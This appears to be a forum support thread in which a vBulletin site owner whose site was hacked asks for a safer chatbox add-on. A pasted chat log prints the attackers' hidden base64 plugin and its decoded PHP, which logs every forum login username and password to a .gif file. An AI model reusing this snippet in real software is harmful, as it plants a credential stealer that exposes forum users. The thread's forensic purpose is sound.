i am using now MGC Chatbox Evo 3.4.0 , my site been hacked lately . i am afriad those kind of addons i put might made the hackers easy way in . is there any secure and safe chabox for vb anyone can recomned to me here .

This one, https://vborg.vbsupport.ru/showthread.php?t=236970

i am using now MGC Chatbox Evo 3.4.0 , my site been hacked lately . i am afriad those kind of addons i put might made the hackers easy way in . is there any secure and safe chabox for vb anyone can recomned to me here .

How do you know it was MGC Chatbox Evo 3.4.0 that allowed hackers to get into your site?

thanks ozzy . is it real secure? did anyone had problem with it ?

--------------- Added 1410266511 at 1410266511 ---------------

not sure if it was MGC Chatbox Evo 3.4.0 that creat that exploit . but for sure it was vsa statitics addon . so aint sure whice of those scripts are secure

--------------- Added 1410268740 at 1410268740 ---------------

Yes the DBTech one is secure for sure.

How do you know it was the VSA stats mod that has a exploit?

i am getting error when importing the xml

The requested URL /admin/vbshout.php was not found on this server.

damm

You need to load the files that came with the mod before importing the XML, read the instructions in the read me file in the mods zip.

ya i intalled . but it isnt good like MGC Chatbox Evo whice has many great options

How do you know it was the VSA stats mod that has a exploit?

What features are missing?

had gif file when opened with notpad showed all users ad passwords .


BiGFiST> well, they added actual plugins
<FireBirD> were
<FireBirD> whice plug ins they added
<BiGFiST> see under vsa stats
<BiGFiST> two login location products
<BiGFiST> there's base64 php code
<BiGFiST> i decrypted that here http://www.base64decode.org/
<BiGFiST> JHN0ciA9ICIiLiRfUE9TVFsndmJfbG9naW5fdXNlcm5hbWUnXS 4iOiIuJF9QT1NUWyd2Yl9sb2dpbl9wYXNzd29yZCddLiJcclxu IjsgDQokZnAgPSBmb3BlbiAoImltYWdlcy9taXNjL3RyZWVfcn guZ2lmIiwgImErIik7IA0KZndyaXRlICgkZnAsICIkc3RyIik7 IA0KZmNsb3NlICgkZnApOw==
<BiGFiST> that gives
<BiGFiST> $str = "".$_POST['vb_login_username'].":".$_POST['vb_login_password']."\r\n";
<BiGFiST> $fp = fopen ("images/misc/tree_rx.gif", "a+");
<BiGFiST> fwrite ($fp, "$str");
<BiGFiST> fclose ($fp);

But that does noy show it came from the chatbox.

not sure were i came from . might be vsa stats or maybe chatbox evo . maybe u can check my site in private ozzy ?

Did you check the access.log and error.log of your webserver? It should be fairly easy to find out how they did it by looking at it.

Also, the plugins they added saved all logins in a image file which can be read by opening it in any editor.

dave or ozzy can u please help me in private . i may give u the ftp info and the admin cp

Feel free to PM me the info of a temporary FTP account, I'll check if there's something in the access.log and/or error.log, in case these files are present.

i asked my webhost to reset my ftp and control pannel pass . as soon they will reset it il leave u a msg dave . thanks man

--------------- Added 1410295914 at 1410295914 ---------------

--------------- Added 1410296852 at 1410296852 ---------------

i sent u a msg dave